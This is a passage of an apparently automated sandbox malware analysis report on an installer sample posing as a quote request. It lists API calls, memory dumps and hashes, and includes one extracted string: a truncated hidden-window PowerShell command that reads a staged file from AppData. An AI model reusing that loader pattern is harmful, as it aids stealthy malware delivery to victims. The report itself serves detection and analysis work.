                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25,?,00000000,000000F0), ref: 00401645
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25, xrefs: 00401638
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                      • String ID: C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25
                                                      • API String ID: 1892508949-515977828
                                                      • Opcode ID: f1836daba45ab719ae6be0485ecbf315c458c9d4f35d31149a8ddeef88df52e7
                                                      • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                      • Opcode Fuzzy Hash: f1836daba45ab719ae6be0485ecbf315c458c9d4f35d31149a8ddeef88df52e7
                                                      • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                      • CloseHandle.KERNEL32(?), ref: 00405730
                                                      Strings
                                                      • Error launching installer, xrefs: 0040570D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                      • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                      • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                      • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                      • Instruction ID: 4318c0865f168c3c39c32caca64743d138ecf2e5224254a141b4117f5842e3e1
                                                      • Opcode Fuzzy Hash: 70ed9be6b19a516ee1bdc764f9130b6af425552e808d5ec72e9cc5d630b6751c
                                                      • Instruction Fuzzy Hash: 6FA14371E00229CBDF28CFA8C854BADBBB1FF44305F15856AD816BB281C7785A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                      • Instruction ID: 8bd9da501ed45a7f5d2d0dfc2be718583217048081f6288eced8fd4e99326474
                                                      • Opcode Fuzzy Hash: b832d1e9d424bd17e50a448eaff65b5f67a7a37aa3c39c188fff0f0b003ab4d8
                                                      • Instruction Fuzzy Hash: D3913370D00229CBDF28CFA8C854BADBBB1FF44305F15812AD816BB291C7795A96CF84
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                      • Instruction ID: cc0f6ab454a14bc981dfc54755cdbe6dc6b21fe19783e5e5045ac21e9f873034
                                                      • Opcode Fuzzy Hash: 543efacfe09541fb47d16f599bc3d2f89866a74d148d0ce9a71c7f41fe14efce
                                                      • Instruction Fuzzy Hash: 57813271E00229CBDB24CFA8C844BADBBB1FF45305F25816AD816BB291C7789A95CF54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                      • Instruction ID: 36932640a45318c75a18aff77ab64511548531c3f0ac059ca6f487157756e1a6
                                                      • Opcode Fuzzy Hash: 3a9d634eb22222d97a486b6052758e716192218fd024008837edea6b82b38ac0
                                                      • Instruction Fuzzy Hash: DB816831D04229DBDB24CFA8D8447ADBBB0FF44305F15816AE856BB2C0C7785A96CF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                      • Instruction ID: ff2225f7ed94bd6a4cfd13171a87750c77ef90a01ce87bb0bc5953b87d28885c
                                                      • Opcode Fuzzy Hash: 0a494eb29fcb275a0dc763b13c131269b6bb38b3c553864eb09d0ec04662bdd1
                                                      • Instruction Fuzzy Hash: F3712271E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB281C7795A96DF54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                      • Instruction ID: 52dfaafe50a83d16d2aca4474dbfbf9792b45fca5ae70f0232ed595026c100c8
                                                      • Opcode Fuzzy Hash: 6fac6182e0c923e6f8468ecc0aebbda853cd3f7fcdb5da74eabe1b8512e0ee84
                                                      • Instruction Fuzzy Hash: E7713371E00229DBDF28CFA8C844BADBBB1FF44305F15806AD816BB291C7795A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                      • Instruction ID: fadc0c566b3b685b80e6fde1c1dc985280178bf592964274442c35b5c3ef9333
                                                      • Opcode Fuzzy Hash: c2091b8c3b7c8f3891448e563915a78250ffa21a1e2beee4011ac230f586c236
                                                      • Instruction Fuzzy Hash: 1D713571E00229DBDF28CF98C844BADBBB1FF44305F15806AD816BB291C7799A96DF44
                                                      APIs
                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                      Strings
                                                      • "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St, xrefs: 00401B5E, 00401B64, 00401B7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree
                                                      • String ID: "powershell.exe" -windowstyle minimized "$Ketonizes=Get-Content -Raw 'C:\Users\user\AppData\Roaming\thrombopenia\Udansk.man';$St
                                                      • API String ID: 3394109436-2362876708
                                                      • Opcode ID: 806f3b55fb246c611b27b236904c5f6d79bd38517f7bf01514c27f3d8d10ef11
                                                      • Instruction ID: 92ea0690437fa8f145506ea4d9625389eaa327d8cc6974590e314eb6964df5ff
                                                      • Opcode Fuzzy Hash: 806f3b55fb246c611b27b236904c5f6d79bd38517f7bf01514c27f3d8d10ef11
                                                      • Instruction Fuzzy Hash: 9121A172600100EBDB20EF94CD8499AB3B9EB84328724403BF102F72D1DBBCA8119F6D
                                                      APIs
                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseOpenValue
                                                      • String ID:
                                                      • API String ID: 167947723-0
                                                      • Opcode ID: 2f817cc1fe1d41dab1cf604ab601c0c0895c4e998819357cf4f8c8e9630ff4c7
                                                      • Instruction ID: d64a4e9cdb2ebe95b75baf9652326c22c9046eba0d0166e80e40b654e8099a4c
                                                      • Opcode Fuzzy Hash: 2f817cc1fe1d41dab1cf604ab601c0c0895c4e998819357cf4f8c8e9630ff4c7
                                                      • Instruction Fuzzy Hash: 16F06D72A04204ABE7209F659E88ABF766DEF80354B10843AF505B61D0D6B85D419B6A
                                                      APIs
                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000008,00000000,?,000000EE), ref: 00401F33
                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F52
                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                      • String ID:
                                                      • API String ID: 2520467145-0
                                                      • Opcode ID: e38053b967ff4da2180d191111a269a6633301e51f37c0785ac14394b1e41b76
                                                      • Instruction ID: ccd79562250fd08bb9f6b0ef2d9321e43f27905c64f031ab58bf806dbc63cb3b
                                                      • Opcode Fuzzy Hash: e38053b967ff4da2180d191111a269a6633301e51f37c0785ac14394b1e41b76
                                                      • Instruction Fuzzy Hash: 98111771A00209BFDB11DFA5CC85EAEBBB5EF44354F14403AF505F62A1DB748A40DB65
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                      • Instruction ID: 40f3ddd491d249f73d2fb4fc43cce1b0e50519406e0a546e2fe7b43c981aace9
                                                      • Opcode Fuzzy Hash: b5ca2ebfc38e8c40cc9dd1a42e0f544b2ed62ef4447f49d6c3b0efbc094499f8
                                                      • Instruction Fuzzy Hash: 2801D131B24210ABE7295B389D05B2A3698E710314F10863EB911F62F1DA78DC138B4D
                                                      APIs
                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteOpenValue
                                                      • String ID:
                                                      • API String ID: 849931509-0
                                                      • Opcode ID: dddba1b7fb40dfba2eebb52e979470bab8911acb43c099432c1d6ae5efd7ed55
